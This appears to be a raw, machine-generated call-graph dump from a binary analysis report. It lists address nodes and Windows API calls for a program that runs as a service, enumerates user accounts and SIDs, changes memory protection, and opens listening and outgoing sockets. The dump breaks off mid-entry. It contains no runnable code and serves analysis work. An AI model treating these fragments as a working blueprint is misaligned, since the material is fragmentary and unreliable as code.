59243->59245 59244 7ffe0eb41a6c 59246->59250 59250->59244 59250->59245 59268 7ffe0eb44af2 GetLastError 59267->59268 59269 7ffe0eb44ae8 59267->59269 59270 7ffe0eb49dc2 6 API calls 59268->59270 59271 7ffe0eb489db 59269->59271 59270->59269 59272 7ffe0eb48a22 59271->59272 59273 7ffe0eb489ec 59271->59273 59276 7ffe0eb49dc2 6 API calls 59272->59276 59274 7ffe0eb48a52 59273->59274 59275 7ffe0eb489f1 59273->59275 59277 7ffe0eb49dc2 6 API calls 59274->59277 59278 7ffe0eb48a82 59275->59278 59279 7ffe0eb489fa 59275->59279 59282 7ffe0eb48a07 59276->59282 59277->59282 59280 7ffe0eb49dc2 6 API calls 59278->59280 59295 7ffe0eb4889c 8 API calls 59279->59295 59280->59282 59282->59170 59282->59174 59283 7ffe0eb489ff 59283->59282 59285 7ffe0eb49dd0 59284->59285 59296 7ffe0eb4d580 59285->59296 59295->59283 59305 7ffe0eb4aa11 59304->59305 59306 7ffe0eb4aa49 59304->59306 59312 7ffe0eb4a6e9 59305->59312 59308 7ffe0eb49dc2 6 API calls 59306->59308 59310 7ffe0eb4aa28 59308->59310 59310->59192 59310->59193 59313 7ffe0eb4a701 59312->59313 59314 7ffe0eb4a71c 59312->59314 59316 7ffe0eb4a74f 59313->59316 59317 7ffe0eb4a706 59313->59317 59315 7ffe0eb49dc2 6 API calls 59314->59315 59322 7ffe0eb4a745 59315->59322 59318 7ffe0eb49dc2 6 API calls 59316->59318 59319 7ffe0eb4a782 59317->59319 59327 7ffe0eb4a70b 59317->59327 59318->59322 59320 7ffe0eb49dc2 6 API calls 59319->59320 59320->59322 59321 7ffe0eb4a7ec 59321->59322 59326 7ffe0eb49dc2 6 API calls 59322->59326 59323 7ffe0eb4a7c1 strcmp 59323->59327 59327->59321 59327->59323 59347 7ffe0eb44e02 LoadLibraryA 59346->59347 59348 7ffe0eb44e2b 59346->59348 59349 7ffe0eb44e10 59347->59349 59350 7ffe0eb44e2e GetLastError 59347->59350 59348->59350 59351 7ffe0eb49dc2 6 API calls 59349->59351 59352 7ffe0eb49dc2 6 API calls 59350->59352 59390 7ffe0e16cb50 GetLastError 59389->59390 59391 7ffe0e16ca2a 59389->59391 59392 7ffe0e16c852 6 API calls 59390->59392 59514 7ffe0e16b930 GetModuleHandleExA 59391->59514 59394 7ffe0e16cb29 59392->59394 59401 7ffe0e16c852 6 API calls 59394->59401 59398 7ffe0e16ca64 strlen 59399 7ffe0e16ca93 59398->59399 59400 7ffe0e16ca7d 59398->59400 59403 7ffe0e16cab8 strlen fopen 59399->59403 59404 7ffe0e16ca98 strcat strlen 59399->59404 59400->59399 59402 7ffe0e16ca82 strlen 59400->59402 59405 7ffe0e16cb46 59401->59405 59402->59399 59406 7ffe0e16cc1d 59403->59406 59407 7ffe0e16cb07 59403->59407 59404->59403 59405->58626 59413 7ffe0e16d824 59405->59413 59409 7ffe0e16c852 6 API calls 59406->59409 59531 7ffe0e16c852 59407->59531 59409->59394 59414 7ffe0e16d889 59413->59414 59415 7ffe0e16d846 59413->59415 59416 7ffe0e16c852 6 API calls 59414->59416 59551 7ffe0e16d490 59415->59551 59422 7ffe0e16d85f 59416->59422 59419 7ffe0e16d8b9 _errno _strtoui64 _errno 59420 7ffe0e16d8ec _errno 59419->59420 59419->59422 59421 7ffe0e16c852 6 API calls 59420->59421 59421->59422 59422->58628 59423 7ffe0e16c25c 59422->59423 59593 7ffe0e16bc64 59423->59593 59459 7ffe0e168b7e OpenSCManagerA 59458->59459 59460 7ffe0e168be6 GetLastError 59458->59460 59461 7ffe0e168bb4 59459->59461 59462 7ffe0e168cbe GetLastError 59459->59462 59463 7ffe0e16c852 6 API calls 59460->59463 59464 7ffe0e168cda 59461->59464 59465 7ffe0e168bc1 59461->59465 59466 7ffe0e16c852 6 API calls 59462->59466 59463->59465 59468 7ffe0e16c852 6 API calls 59464->59468 59467 7ffe0e16c852 6 API calls 59465->59467 59466->59464 59469 7ffe0e168bde 59467->59469 59468->59469 59469->58628 59470 7ffe0e16b87e WSAStartup 59469->59470 59471 7ffe0e16b8c2 59470->59471 59472 7ffe0e16b89a 59470->59472 59515 7ffe0e16b962 GetLastError 59514->59515 59516 7ffe0e16b958 59514->59516 59517 7ffe0e16c852 6 API calls 59515->59517 59518 7ffe0e16466b 59516->59518 59517->59516 59519 7ffe0e1646b2 59518->59519 59520 7ffe0e16467c 59518->59520 59521 7ffe0e16c852 6 API calls 59519->59521 59522 7ffe0e1646e2 59520->59522 59523 7ffe0e164681 59520->59523 59529 7ffe0e164697 59521->59529 59526 7ffe0e16c852 6 API calls 59522->59526 59524 7ffe0e164712 59523->59524 59525 7ffe0e16468a 59523->59525 59528 7ffe0e16c852 6 API calls 59524->59528 59542 7ffe0e16452c 8 API calls 59525->59542 59526->59529 59528->59529 59529->59394 59529->59398 59530 7ffe0e16468f 59530->59529 59532 7ffe0e16c860 59531->59532 59543 7ffe0e170ac0 59532->59543 59542->59530 59552 7ffe0e16d4a1 59551->59552 59553 7ffe0e16d4d9 59551->59553 59559 7ffe0e16d179 59552->59559 59555 7ffe0e16c852 6 API calls 59553->59555 59557 7ffe0e16d4b8 59555->59557 59557->59419 59557->59422 59560 7ffe0e16d191 59559->59560 59561 7ffe0e16d1ac 59559->59561 59563 7ffe0e16d1df 59560->59563 59564 7ffe0e16d196 59560->59564 59562 7ffe0e16c852 6 API calls 59561->59562 59566 7ffe0e16d1d5 59562->59566 59567 7ffe0e16c852 6 API calls 59563->59567 59565 7ffe0e16d212 59564->59565 59574 7ffe0e16d19b 59564->59574 59568 7ffe0e16c852 6 API calls 59565->59568 59573 7ffe0e16c852 6 API calls 59566->59573 59567->59566 59568->59566 59569 7ffe0e16d27c 59569->59566 59571 7ffe0e16d251 strcmp 59571->59574 59574->59569 59574->59571 59594 7ffe0e16bc72 LoadLibraryA 59593->59594 59595 7ffe0e16bc9b 59593->59595 59596 7ffe0e16bc80 59594->59596 59597 7ffe0e16bc9e GetLastError 59594->59597 59595->59597 59598 7ffe0e16c852 6 API calls 59596->59598 59599 7ffe0e16c852 6 API calls 59597->59599 59637 7ffe0e1343d0 GetLastError 59636->59637 59638 7ffe0e1342aa 59636->59638 59639 7ffe0e1340d2 6 API calls 59637->59639 59749 7ffe0e132700 GetModuleHandleExA 59638->59749 59645 7ffe0e1343a9 59639->59645 59644 7ffe0e1342e4 strlen 59647 7ffe0e134313 59644->59647 59648 7ffe0e1342fd 59644->59648 59646 7ffe0e1340d2 6 API calls 59645->59646 59659 7ffe0e1343c6 59646->59659 59649 7ffe0e134338 strlen fopen 59647->59649 59650 7ffe0e134318 strcat strlen 59647->59650 59648->59647 59651 7ffe0e134302 strlen 59648->59651 59652 7ffe0e134387 59649->59652 59653 7ffe0e13449d 59649->59653 59650->59649 59651->59647 59766 7ffe0e1340d2 59652->59766 59655 7ffe0e1340d2 6 API calls 59653->59655 59655->59645 59659->58643 59660 7ffe0e1351c4 59659->59660 59661 7ffe0e135229 59660->59661 59662 7ffe0e1351e6 59660->59662 59664 7ffe0e1340d2 6 API calls 59661->59664 59786 7ffe0e134e30 59662->59786 59667 7ffe0e1351ff 59664->59667 59666 7ffe0e135259 _errno _strtoui64 _errno 59666->59667 59668 7ffe0e13528c _errno 59666->59668 59667->58654 59670 7ffe0e13210c 59667->59670 59669 7ffe0e1340d2 6 API calls 59668->59669 59669->59667 59828 7ffe0e132a34 59670->59828 59706 7ffe0e1362f2 59705->59706 59707 7ffe0e1362ca 59705->59707 59709 7ffe0e1340d2 6 API calls 59706->59709 59708 7ffe0e1340d2 6 API calls 59707->59708 59710 7ffe0e135511 59708->59710 59711 7ffe0e13630b 59709->59711 59710->58654 59713 7ffe0e138f74 InitializeCriticalSectionAndSpinCount 59710->59713 59712 7ffe0e1340d2 6 API calls 59711->59712 59712->59710 59714 7ffe0e138f8f 59713->59714 59715 7ffe0e138fc4 GetLastError 59713->59715 59716 7ffe0e1340d2 6 API calls 59714->59716 59717 7ffe0e1340d2 6 API calls 59715->59717 59720 7ffe0e13551a 59716->59720 59718 7ffe0e138fe2 59717->59718 59720->58654 59750 7ffe0e132732 GetLastError 59749->59750 59751 7ffe0e132728 59749->59751 59752 7ffe0e1340d2 6 API calls 59750->59752 59753 7ffe0e13ce6b 59751->59753 59752->59751 59754 7ffe0e13ceb2 59753->59754 59755 7ffe0e13ce7c 59753->59755 59758 7ffe0e1340d2 6 API calls 59754->59758 59756 7ffe0e13ce81 59755->59756 59757 7ffe0e13cee2 59755->59757 59760 7ffe0e13cf12 59756->59760 59761 7ffe0e13ce8a 59756->59761 59759 7ffe0e1340d2 6 API calls 59757->59759 59764 7ffe0e1342da 59758->59764 59759->59764 59762 7ffe0e1340d2 6 API calls 59760->59762 59777 7ffe0e13cd2c 8 API calls 59761->59777 59762->59764 59764->59644 59764->59645 59765 7ffe0e13ce8f 59765->59764 59767 7ffe0e1340e0 59766->59767 59778 7ffe0e13eea0 59767->59778 59777->59765 59787 7ffe0e134e41 59786->59787 59788 7ffe0e134e79 59786->59788 59794 7ffe0e134b19 59787->59794 59790 7ffe0e1340d2 6 API calls 59788->59790 59791 7ffe0e134e58 59790->59791 59791->59666 59791->59667 59795 7ffe0e134b31 59794->59795 59796 7ffe0e134b4c 59794->59796 59797 7ffe0e134b7f 59795->59797 59798 7ffe0e134b36 59795->59798 59799 7ffe0e1340d2 6 API calls 59796->59799 59800 7ffe0e1340d2 6 API calls 59797->59800 59801 7ffe0e134bb2 59798->59801 59808 7ffe0e134b3b 59798->59808 59804 7ffe0e134b75 59799->59804 59800->59804 59802 7ffe0e1340d2 6 API calls 59801->59802 59802->59804 59803 7ffe0e134c1c 59803->59804 59807 7ffe0e1340d2 6 API calls 59804->59807 59805 7ffe0e134bf1 strcmp 59805->59808 59808->59803 59808->59805 59829 7ffe0e132a42 LoadLibraryA 59828->59829 59830 7ffe0e132a6b 59828->59830 59831 7ffe0e132a6e GetLastError 59829->59831 59832 7ffe0e132a50 59829->59832 59830->59831 59833 7ffe0e1340d2 6 API calls 59831->59833 59834 7ffe0e1340d2 6 API calls 59832->59834 59872 7ffe11ec152a 59871->59872 59873 7ffe11ec1650 GetLastError 59871->59873 59976 7ffe11ec3a80 GetModuleHandleExA 59872->59976 59875 7ffe11ec1352 6 API calls 59873->59875 59877 7ffe11ec1629 59875->59877 59881 7ffe11ec1352 6 API calls 59877->59881 59880 7ffe11ec1564 strlen 59882 7ffe11ec157d 59880->59882 59883 7ffe11ec1593 59880->59883 59884 7ffe11ec12a2 59881->59884 59882->59883 59885 7ffe11ec1582 strlen 59882->59885 59886 7ffe11ec15b8 strlen fopen 59883->59886 59887 7ffe11ec1598 strcat strlen 59883->59887 59884->58663 59895 7ffe11ec2324 59884->59895 59885->59883 59888 7ffe11ec1607 59886->59888 59889 7ffe11ec171d 59886->59889 59887->59886 59891 7ffe11ec1352 6 API calls 59888->59891 59890 7ffe11ec1352 6 API calls 59889->59890 59890->59877 59892 7ffe11ec1621 59891->59892 59892->59877 59893 7ffe11ec178d 59892->59893 59896 7ffe11ec2389 59895->59896 59897 7ffe11ec2346 59895->59897 59899 7ffe11ec1352 6 API calls 59896->59899 59994 7ffe11ec1f90 59897->59994 59904 7ffe11ec12e1 59899->59904 59901 7ffe11ec23b9 _errno _strtoui64 _errno 59902 7ffe11ec23ec _errno 59901->59902 59901->59904 59904->58667 59905 7ffe11ec348c 59904->59905 60036 7ffe11ec3db4 59905->60036 59941 7ffe11ec4b7a 59940->59941 59942 7ffe11ec4ba2 59940->59942 59944 7ffe11ec1352 6 API calls 59941->59944 59943 7ffe11ec1352 6 API calls 59942->59943 59946 7ffe11ec4bbb 59943->59946 59945 7ffe11ec4b94 59944->59945 59945->58661 59947 7ffe11ec1352 6 API calls 59946->59947 59947->59945 59949 7ffe11ec2b9d CreateThread 59948->59949 59950 7ffe11ec2c1b GetLastError 59948->59950 59951 7ffe11ec2be9 59949->59951 59952 7ffe11ec2cf3 GetLastError 59949->59952 59953 7ffe11ec1352 6 API calls 59950->59953 59977 7ffe11ec1546 59976->59977 59978 7ffe11ec3ab2 GetLastError 59976->59978 59980 7ffe11ec7feb 59977->59980 59979 7ffe11ec1352 6 API calls 59978->59979 59979->59977 59981 7ffe11ec7ffc 59980->59981 59982 7ffe11ec8032 59980->59982 59984 7ffe11ec8062 59981->59984 59985 7ffe11ec8001 59981->59985 59983 7ffe11ec1352 6 API calls 59982->59983 59989 7ffe11ec155a 59983->59989 59986 7ffe11ec1352 6 API calls 59984->59986 59987 7ffe11ec800a 59985->59987 59988 7ffe11ec8092 59985->59988 59986->59989 59993 7ffe11ec7eac 8 API calls 59987->59993 59990 7ffe11ec1352 6 API calls 59988->59990 59989->59877 59989->59880 59990->59989 59992 7ffe11ec800f 59992->59989 59993->59992 59995 7ffe11ec1fd9 59994->59995 59996 7ffe11ec1fa1 59994->59996 59998 7ffe11ec1352 6 API calls 59995->59998 60002 7ffe11ec1c79 59996->60002 60000 7ffe11ec1fb8 59998->60000 60000->59901 60000->59904 60003 7ffe11ec1cac 60002->60003 60004 7ffe11ec1c91 60002->60004 60005 7ffe11ec1352 6 API calls 60003->60005 60006 7ffe11ec1c96 60004->60006 60007 7ffe11ec1cdf 60004->60007 60011 7ffe11ec1cd5 60005->60011 60009 7ffe11ec1d12 60006->60009 60013 7ffe11ec1c9b 60006->60013 60008 7ffe11ec1352 6 API calls 60007->60008 60008->60011 60010 7ffe11ec1352 6 API calls 60009->60010 60010->60011 60017 7ffe11ec1352 6 API calls 60011->60017 60012 7ffe11ec1d7c 60012->60011 60013->60012 60014 7ffe11ec1d51 strcmp 60013->60014 60014->60013 60037 7ffe11ec3deb 60036->60037 60038 7ffe11ec3dc2 LoadLibraryA 60036->60038 60040 7ffe11ec3dee GetLastError 60037->60040 60039 7ffe11ec3dd0 60038->60039 60038->60040 60041 7ffe11ec1352 6 API calls 60039->60041 60042 7ffe11ec1352 6 API calls 60040->60042 60080 7ff6ef65aa85 60079->60080 60081 7ff6ef65aa6e 60079->60081 60086 7ff6ef65bac0 fputc 60080->60086 60085 7ff6ef65bac0 fputc 60081->60085 60084 7ff6ef652f59 60084->58129 60084->58130 60084->58132 60085->60084 60086->60084 60087 7ffe13383553 60101 7ffe13383563 60087->60101 60088 7ffe1338376e 60089 7ffe13383774 60088->60089 60167 7ffe13382785 60088->60167 60093 7ffe13383593 Sleep 60093->60101 60094 7ffe13382072 7 API calls 60094->60101 60097 7ffe13382785 11 API calls 60097->60101 60099 7ffe1338363e GetProcessHeap HeapAlloc 60100 7ffe13383664 CreateThread 60099->60100 60099->60101 60102 7ffe133836a3 EnterCriticalSection 60100->60102 60103 7ffe13383721 GetLastError 60100->60103 60101->60088 60101->60093 60101->60094 60101->60097 60101->60099 60108 7ffe13383752 GetProcessHeap HeapFree 60101->60108 60109 7ffe133828ba socket 60101->60109 60127 7ffe133826b9 60101->60127 60133 7ffe13382604 setsockopt 60101->60133 60140 7ffe13382c99 60101->60140 60163 7ffe133827ea setsockopt 60101->60163 60105 7ffe133836c3 LeaveCriticalSection 60102->60105 60104 7ffe13382072 7 API calls 60103->60104 60104->60101 60107 7ffe13382072 7 API calls 60105->60107 60107->60101 60108->60101 60110 7ffe133829c2 WSAGetLastError 60109->60110 60111 7ffe133828eb 60109->60111 60112 7ffe13382072 7 API calls 60110->60112 60113 7ffe133827ea 9 API calls 60111->60113 60114 7ffe133829e6 60112->60114 60115 7ffe133828f8 60113->60115 60119 7ffe13382072 7 API calls 60114->60119 60124 7ffe133829b9 60114->60124 60116 7ffe133829b1 60115->60116 60117 7ffe13382901 htonl htons bind 60115->60117 60118 7ffe13382785 11 API calls 60116->60118 60120 7ffe13382984 WSAGetLastError 60117->60120 60121 7ffe13382941 listen 60117->60121 60118->60124 60119->60124 60123 7ffe13382072 7 API calls 60120->60123 60121->60114 60122 7ffe1338295a WSAGetLastError 60121->60122 60125 7ffe13382072 7 API calls 60122->60125 60126 7ffe13382982 60123->60126 60124->60101 60125->60126 60126->60114 60126->60116 60128 7ffe133826c9 ioctlsocket 60127->60128 60130 7ffe133826fd WSAGetLastError 60128->60130 60131 7ffe133826ec 60128->60131 60132 7ffe13382072 7 API calls 60130->60132 60131->60101 60132->60131 60134 7ffe13382694 WSAGetLastError 60133->60134 60135 7ffe13382639 setsockopt 60133->60135 60137 7ffe13382072 7 API calls 60134->60137 60136 7ffe1338266f WSAGetLastError 60135->60136 60139 7ffe13382665 60135->60139 60138 7ffe13382072 7 API calls 60136->60138 60137->60139 60138->60139 60139->60101 60141 7ffe13382cc4 60140->60141 60142 7ffe13382d58 accept 60140->60142 60143 7ffe133826b9 9 API calls 60141->60143 60144 7ffe13382d7e 60142->60144 60145 7ffe13382e9a WSAGetLastError 60142->60145 60146 7ffe13382cce 60143->60146 60148 7ffe133826b9 9 API calls 60144->60148 60147 7ffe13382072 7 API calls 60145->60147 60149 7ffe13382cee select 60146->60149 60161 7ffe13382cd3 60146->60161 60147->60161 60150 7ffe13382d8b 60148->60150 60151 7ffe13382d52 60149->60151 60152 7ffe13382e29 60149->60152 60153 7ffe13382d94 htonl htons 60150->60153 60154 7ffe13382e86 60150->60154 60151->60142 60157 7ffe13382e53 WSAGetLastError 60151->60157 60159 7ffe13382072 7 API calls 60152->60159 60155 7ffe13382db7 60153->60155 60156 7ffe13382785 11 API calls 60154->60156 60162 7ffe13382072 7 API calls 60155->60162 60156->60161 60160 7ffe13382072 7 API calls 60157->60160 60159->60161 60160->60161 60161->60101 60162->60161 60164 7ffe13382831 WSAGetLastError 60163->60164 60165 7ffe13382827 60163->60165 60166 7ffe13382072 7 API calls 60164->60166 60165->60101 60166->60165 60168 7ffe13382799 60167->60168 60175 7ffe13382793 60167->60175 60176 7ffe13382722 shutdown 60168->60176 60171 7ffe133827b1 60173 7ffe13382072 7 API calls 60171->60173 60172 7ffe133827c9 WSAGetLastError 60174 7ffe13382072 7 API calls 60172->60174 60173->60175 60174->60175 60175->60089 60177 7ffe1338273b 60176->60177 60178 7ffe13382759 WSAGetLastError 60176->60178 60181 7ffe13382072 7 API calls 60177->60181 60179 7ffe13382751 closesocket 60178->60179 60180 7ffe13382766 60178->60180 60179->60171 60179->60172 60182 7ffe13382072 7 API calls 60180->60182 60181->60179 60182->60179 60183 7ff6ef6512fd 60186 7ff6ef651131 60183->60186 60187 7ff6ef65115a 60186->60187 60188 7ff6ef651172 60187->60188 60189 7ff6ef651169 Sleep 60187->60189 60190 7ff6ef651188 _amsg_exit 60188->60190 60191 7ff6ef651194 60188->60191 60189->60187 60193 7ff6ef6511b5 60190->60193 60192 7ff6ef65119a _initterm 60191->60192 60191->60193 60192->60193 60194 7ff6ef6511c5 _initterm 60193->60194 60195 7ff6ef6511de 60193->60195 60194->60195 60207 7ff6ef65a1bb 60195->60207 60198 7ff6ef65122e 60199 7ff6ef651233 malloc 60198->60199 60200 7ff6ef651253 60199->60200 60201 7ff6ef651258 strlen malloc 60200->60201 60202 7ff6ef651283 60200->60202 60201->60200 60218 7ff6ef651fa9 60202->60218 60204 7ff6ef6512c4 60205 7ff6ef6512e8 60204->60205 60206 7ff6ef6512e3 _cexit 60204->60206 60206->60205 60208 7ff6ef651208 SetUnhandledExceptionFilter 60207->60208 60210 7ff6ef65a1d9 60207->60210 60208->60198 60209 7ff6ef65a3df 60209->60208 60212 7ff6ef65a407 VirtualProtect 60209->60212 60210->60209 60211 7ff6ef65a250 60210->60211 60216 7ff6ef65a28f 60210->60216 60211->60209 60213 7ff6ef65a26e 60211->60213 60212->60209 60213->60211 60222 7ff6ef65a074 VirtualQuery VirtualProtect GetLastError 60213->60222 60215 7ff6ef65a2fa 60223 7ff6ef65a074 VirtualQuery VirtualProtect GetLastError 60215->60223 60216->60209 60216->60215 60219 7ff6ef651fb9 60218->60219 60224 7ff6ef651dbc 60219->60224 60222->60213 60223->60216 60225 7ff6ef651dc6 strcmp 60224->60225 60227 7ff6ef651ddd strcmp 60225->60227 60228 7ff6ef651e40 60225->60228 60230 7ff6ef651df4 StartServiceCtrlDispatcherA 60227->60230 60231 7ff6ef651f81 60227->60231 60229 7ff6ef65161a 116 API calls 60228->60229 60232 7ff6ef651e45 60229->60232 60234 7ff6ef651e98 GetLastError 60230->60234 60242 7ff6ef651e2d 60230->60242 60233 7ff6ef652ef2 6 API calls 60231->60233 60235 7ff6ef651e4b 60232->60235 60238 7ff6ef6516e3 372 API calls 60232->60238 60233->60242 60236 7ff6ef652ef2 6 API calls 60234->60236 60245 7ff6ef651a63 10 API calls 60235->60245 60236->60242 60240 7ff6ef651e5f 60238->60240 60239 7ff6ef651e50 60246 7ff6ef651b1c 13 API calls 60239->60246 60240->60235 60243 7ff6ef651e69 _read 60240->60243 60244 7ff6ef6519e2 25 API calls 60240->60244 60242->60204 60243->60235 60243->60240 60244->60240 60245->60239 60246->60242 60247 7ffe0e137174 60285 7ffe0e136da3 60247->60285 60248 7ffe0e1371c3 wcslen GetProcessHeap HeapAlloc 60248->60285 60249 7ffe0e137283 NetApiBufferFree 60250 7ffe0e137273 60249->60250 60250->60249 60251 7ffe0e1373c3 60250->60251 60253 7ffe0e1372a6 NetUserEnum 60250->60253 60262 7ffe0e137322 GetProcessHeap HeapAlloc 60250->60262 60255 7ffe0e137409 60251->60255 60256 7ffe0e1373cc 60251->60256 60252 7ffe0e137234 GetProcessHeap HeapAlloc 60254 7ffe0e137258 60252->60254 60252->60285 60253->60250 60258 7ffe0e1340d2 6 API calls 60254->60258 60254->60285 60257 7ffe0e1340d2 6 API calls 60255->60257 60259 7ffe0e13751a 60256->60259 60261 7ffe0e1373d4 60256->60261 60257->60261 60258->60254 60264 7ffe0e1340d2 6 API calls 60259->60264 60260 7ffe0e136dce LocalAlloc 60260->60285 60294 7ffe0e136c7f 60261->60294 60266 7ffe0e136d83 60262->60266 60267 7ffe0e13735c 60262->60267 60269 7ffe0e1373f6 60264->60269 60265 7ffe0e136ded wcsncpy 60291 7ffe0e1393ef 60265->60291 60266->60250 60273 7ffe0e1340d2 6 API calls 60266->60273 60271 7ffe0e1373a1 60267->60271 60272 7ffe0e137368 memcpy GetProcessHeap HeapFree 60267->60272 60272->60271 60273->60266 60274 7ffe0e1340d2 6 API calls 60274->60269 60276 7ffe0e136ebe GetLastError 60279 7ffe0e136ee1 LocalAlloc 60276->60279 60276->60285 60277 7ffe0e137070 ConvertSidToStringSidA 60282 7ffe0e1370c1 GetLastError 60277->60282 60277->60285 60278 7ffe0e136e75 GetLastError 60280 7ffe0e1340d2 6 API calls 60278->60280 60283 7ffe0e136eff LookupAccountNameW 60279->60283 60284 7ffe0e137066 60279->60284 60280->60285 60281 7ffe0e1340d2 6 API calls 60281->60285 60288 7ffe0e1340d2 6 API calls 60282->60288 60286 7ffe0e136f41 GetLastError 60283->60286 60287 7ffe0e136f33 LocalFree 60283->60287 60284->60277 60285->60248 60285->60250 60285->60252 60285->60260 60285->60265 60285->60277 60285->60278 60285->60281 60285->60287 60289 7ffe0e1340d2 6 API calls 60286->60289 60287->60285 60288->60285 60290 7ffe0e136f5f 60289->60290 60290->60287 60292 7ffe0e139417 wcslen 60291->60292 60293 7ffe0e136e17 LookupAccountNameW 60291->60293 60292->60293 60293->60276 60293->60285 60295 7ffe0e136d44 60294->60295 60296 7ffe0e136c92 60294->60296 60295->60274 60297 7ffe0e136d21 60296->60297 60298 7ffe0e136ccd GetProcessHeap HeapFree 60296->60298 60300 7ffe0e136cf2 GetProcessHeap HeapFree 60296->60300 60301 7ffe0e136c9d LocalFree 60296->60301 60302 7ffe0e136d19 LocalFree 60296->60302 60297->60295 60299 7ffe0e136d2d GetProcessHeap HeapFree 60297->60299 60298->60296 60299->60295 60300->60296 60301->60296 60302->60296 60303 7ffe133833cf 60304 7ffe133833fa LeaveCriticalSection 60303->60304 60305 7ffe133833d7 60303->60305 60306 7ffe13383388 60304->60306 60305->60303 60322 7ffe13382f7d 60305->60322 60307 7ffe1338340c GetProcessHeap HeapFree 60306->60307 60309 7ffe133834eb Sleep SleepEx 60306->60309 60310 7ffe133834fb EnterCriticalSection 60306->60310 60311 7ffe1338343a EnterCriticalSection 60306->60311 60313 7ffe1338345d LeaveCriticalSection 60306->60313 60316 7ffe133833b2 60306->60316 60319 7ffe133833a8 60306->60319 60333 7ffe133889d5 GetSystemTimeAsFileTime 60306->60333 60307->60306 60309->60310 60312 7ffe13383508 60310->60312 60311->60306 60311->60313 60314 7ffe13383539 LeaveCriticalSection 60312->60314 60315 7ffe13383520 GetProcessHeap HeapFree 60312->60315 60313->60306 60315->60312 60318 7ffe13382072 7 API calls 60316->60318 60320 7ffe133834ca EnterCriticalSection 60318->60320 60334 7ffe133889d5 GetSystemTimeAsFileTime 60319->60334 60323 7ffe1338302c 60322->60323 60324 7ffe13382fa8 60322->60324 60325 7ffe13382072 7 API calls 60323->60325 60324->60323 60326 7ffe13382fad 60324->60326 60329 7ffe13383000 60325->60329 60327 7ffe13382fb6 send 60326->60327 60330 7ffe13382ff9 60326->60330 60327->60326 60328 7ffe13382fda WSAGetLastError 60327->60328 60331 7ffe13382072 7 API calls 60328->60331 60329->60305 60330->60329 60332 7ffe13382072 7 API calls 60330->60332 60331->60330 60332->60329 60333->60306 60334->60316 60335 7ffe0e16a31a 60338 7ffe0e16a325 60335->60338 60336 7ffe0e16a42e 60337 7ffe0e16a43b 60336->60337 60402 7ffe0e16ad75 10 API calls 60336->60402 60338->60336 60339 7ffe0e16a34d Sleep 60338->60339 60343 7ffe0e16a402 Sleep 60338->60343 60344 7ffe0e16ad75 10 API calls 60338->60344 60346 7ffe0e16a3ee memcpy 60338->60346 60347 7ffe0e16b00c socket 60338->60347 60382 7ffe0e16b4ba 60338->60382 60393 7ffe0e16a250 60338->60393 60339->60338 60343->60338 60344->60338 60346->60338 60348 7ffe0e16b043 60347->60348 60349 7ffe0e16b20b WSAGetLastError 60347->60349 60351 7ffe0e16b065 60348->60351 60352 7ffe0e16b047 60348->60352 60350 7ffe0e16c852 6 API calls 60349->60350 60353 7ffe0e16b22f 60350->60353 60354 7ffe0e16aca9 8 API calls 60351->60354 60403 7ffe0e16aca9 60352->60403 60357 7ffe0e16b239 60353->60357 60358 7ffe0e16b07f 60353->60358 60359 7ffe0e16b063 60354->60359 60361 7ffe0e16c852 6 API calls 60357->60361 60363 7ffe0e16c852 6 API calls 60358->60363 60362 7ffe0e16b077 60359->60362 60416 7ffe0e16adda setsockopt 60359->60416 60360 7ffe0e16b0be 60360->60362 60364 7ffe0e16b0c3 htonl htons connect 60360->60364 60366 7ffe0e16b0a0 60361->60366 60420 7ffe0e16ad75 10 API calls 60362->60420 60363->60366 60369 7ffe0e16b101 60364->60369 60370 7ffe0e16b11c WSAGetLastError 60364->60370 60366->60338 60371 7ffe0e16aca9 8 API calls 60369->60371 60372 7ffe0e16b1de WSAGetLastError 60370->60372 60373 7ffe0e16b12d 60370->60373 60375 7ffe0e16b10e 60371->60375 60374 7ffe0e16c852 6 API calls 60372->60374 60373->60362 60376 7ffe0e16b135 select 60373->60376 60374->60362 60375->60353 60375->60362 60377 7ffe0e16b1c0 60376->60377 60378 7ffe0e16b196 60376->60378 60380 7ffe0e16c852 6 API calls 60377->60380 60378->60369 60379 7ffe0e16b19c WSAGetLastError 60378->60379 60381 7ffe0e16c852 6 API calls 60379->60381 60380->60362 60381->60362 60383 7ffe0e16b4d4 60382->60383 60384 7ffe0e16b548 60382->60384 60383->60384 60386 7ffe0e16b4d9 recv 60383->60386 60385 7ffe0e16c852 6 API calls 60384->60385 60387 7ffe0e16b4f3 60385->60387 60388 7ffe0e16b4ef 60386->60388 60389 7ffe0e16b4fc WSAGetLastError 60386->60389 60387->60338 60388->60387 60391 7ffe0e16c852 6 API calls 60388->60391 60389->60387 60390 7ffe0e16b510 60389->60390 60392 7ffe0e16c852 6 API calls 60390->60392 60391->60387 60392->60387 60394 7ffe0e16a312 60393->60394 60395 7ffe0e16a268 60393->60395 60394->60338 60395->60394 60421 7ffe0e169035 60395->60421 60398 7ffe0e16a304 LeaveCriticalSection 60398->60394 60399 7ffe0e16a298 60399->60398 60400 7ffe0e16c852 6 API calls 60399->60400 60424 7ffe0e16e417 60399->60424 60400->60399 60402->60337 60404 7ffe0e16acb9 ioctlsocket 60403->60404 60406 7ffe0e16acdc 60404->60406 60407 7ffe0e16aced WSAGetLastError 60404->60407 60406->60360 60409 7ffe0e16abf4 setsockopt 60406->60409 60408 7ffe0e16c852 6 API calls 60407->60408 60408->60406 60410 7ffe0e16ac84 WSAGetLastError 60409->60410 60411 7ffe0e16ac29 setsockopt 60409->60411 60412 7ffe0e16c852 6 API calls 60410->60412 60413 7ffe0e16ac5f WSAGetLastError 60411->60413 60414 7ffe0e16ac55 60411->60414 60412->60414 60415 7ffe0e16c852 6 API calls 60413->60415 60414->60359 60415->60414 60417 7ffe0e16ae21 WSAGetLastError 60416->60417 60418 7ffe0e16ae17 60416->60418 60419 7ffe0e16c852 6 API calls 60417->60419 60418->60360 60419->60418 60420->60358 60422 7ffe0e169040 EnterCriticalSection 60421->60422 60423 7ffe0e16904b GetSystemTimeAsFileTime 60421->60423 60422->60399 60423->60422 60425 7ffe0e16e447 60424->60425 60441 7ffe0e16e46f 60424->60441 60426 7ffe0e16e451 60425->60426 60427 7ffe0e16e4b7 60425->60427 60428 7ffe0e16e453 60426->60428 60429 7ffe0e16e48d 60426->60429 60455 7ffe0e16dc4a 90 API calls 60427->60455 60433 7ffe0e16e4c5 60428->60433 60434 7ffe0e16e45a 60428->60434 60431 7ffe0e16e494 60429->60431 60432 7ffe0e16e4be 60429->60432 60437 7ffe0e16e4b0 60431->60437 60438 7ffe0e16e49b 60431->60438 60456 